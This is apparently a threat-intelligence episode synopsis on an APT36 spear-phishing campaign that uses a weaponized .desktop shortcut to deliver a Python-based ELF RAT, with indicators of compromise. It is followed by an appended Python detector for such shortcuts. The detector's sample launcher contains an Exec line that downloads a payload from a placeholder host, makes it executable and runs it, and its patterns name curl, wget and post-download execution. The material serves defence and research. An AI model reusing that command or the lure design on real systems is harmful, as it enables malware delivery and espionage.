CYFIRMA Research- APT36 Python Based ELF Malware Targeting Indian Government Entities

11/12/2025 4 min


Episode Synopsis

APT36 Targets Indian Government Entities with a New Python-Based ELF Malware.

CYFIRMA has uncovered a new cyber-espionage campaign by APT36 (Transparent Tribe), a Pakistan-based threat actor long known for targeting Indian government entities and strategic sectors. This campaign showcases a major leap in the group's technical sophistication: custom Python-based ELF malware is delivered through weaponized .desktop shortcut files distributed via spear-phishing.

Key Highlights:

- The campaign begins with a malicious ZIP file containing a deceptive .desktop shortcut.
- Once executed, the shortcut downloads:
  - a decoy PDF to distract the user;
  - a malicious ELF payload (swcbc);
  - a persistence-enabling shell script (swcbc.sh).
- The malware establishes C2 communication, executes shell/Python commands, steals files, takes screenshots, and maintains persistence.
- Infrastructure used includes Lionsdenim[.]xyz and 185.235.137.90, both tied to APT36's ongoing espionage operations.
- The ELF implant is a PyInstaller-packed RAT, supporting cross-platform execution on both Linux and Windows.

Link to the Research Report: APT36 Python Based ELF Malware Targeting Indian Government Entities - CYFIRMA

#CyberSecurity #ThreatIntel #APT36 #MalwareAnalysis #IndianGovernment #LinuxMalware #CYFIRMA #CyberEspionage #ThreatResearch #ELFMalware #PyInstaller #TransparentTribe #ExternalThreatLandscapeManagement

https://www.cyfirma.com/
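A triage heuristic for the weaponized .desktop lure described in the synopsis, added here as an illustrative example (not CYFIRMA's code and not taken from the report): it parses a launcher and flags traits of a shortcut that fetches and runs remote content at launch. The sample launcher, its host name and its file paths are constructed placeholders, and the document-lookalike name check is an assumption about the lure, not a detail stated above.

```python
import re

# Constructed sample modelled on the lure described in the synopsis (a shortcut
# that fetches a decoy PDF plus a payload and runs it). Host name and paths are
# placeholders, not indicators taken from the report.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Notice.pdf
Terminal=false
Exec=bash -c "curl -s http://c2-placeholder.invalid/d.pdf -o /tmp/d.pdf; xdg-open /tmp/d.pdf; curl -s http://c2-placeholder.invalid/p -o /tmp/.p && chmod +x /tmp/.p && /tmp/.p"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""


def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group (last value wins)."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def desktop_indicators(text):
    """List the heuristic indicators a .desktop launcher triggers (empty = nothing odd)."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    hits = []
    downloads = re.search(r"\b(curl|wget)\b", exec_line) is not None
    if downloads:
        hits.append("download_tool")            # fetches remote content at launch
    if downloads and re.search(r"chmod\s+\+x|\b(ba)?sh\b|\bpython3?\b", exec_line):
        hits.append("exec_after_download")      # downloaded content is made runnable or run
    if re.search(r"/tmp/|/\.[A-Za-z0-9_]", exec_line):
        hits.append("tmp_or_hidden_path")       # staging in /tmp or under a dot-file name
    if len(re.findall(r"&&|\|\||;|\|", exec_line)) >= 2:
        hits.append("chained_commands")         # several commands packed into one Exec
    name = entry.get("Name", "").lower()
    if entry.get("Type") == "Application" and re.search(r"\.(pdf|docx?|xlsx?)$", name):
        hits.append("document_lookalike_name")  # launcher posing as a document (assumed trait)
    return hits
```

Run it over every .desktop file pulled from a suspicious archive; a launcher that scores on download_tool together with exec_after_download warrants a full look at the fetched files.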
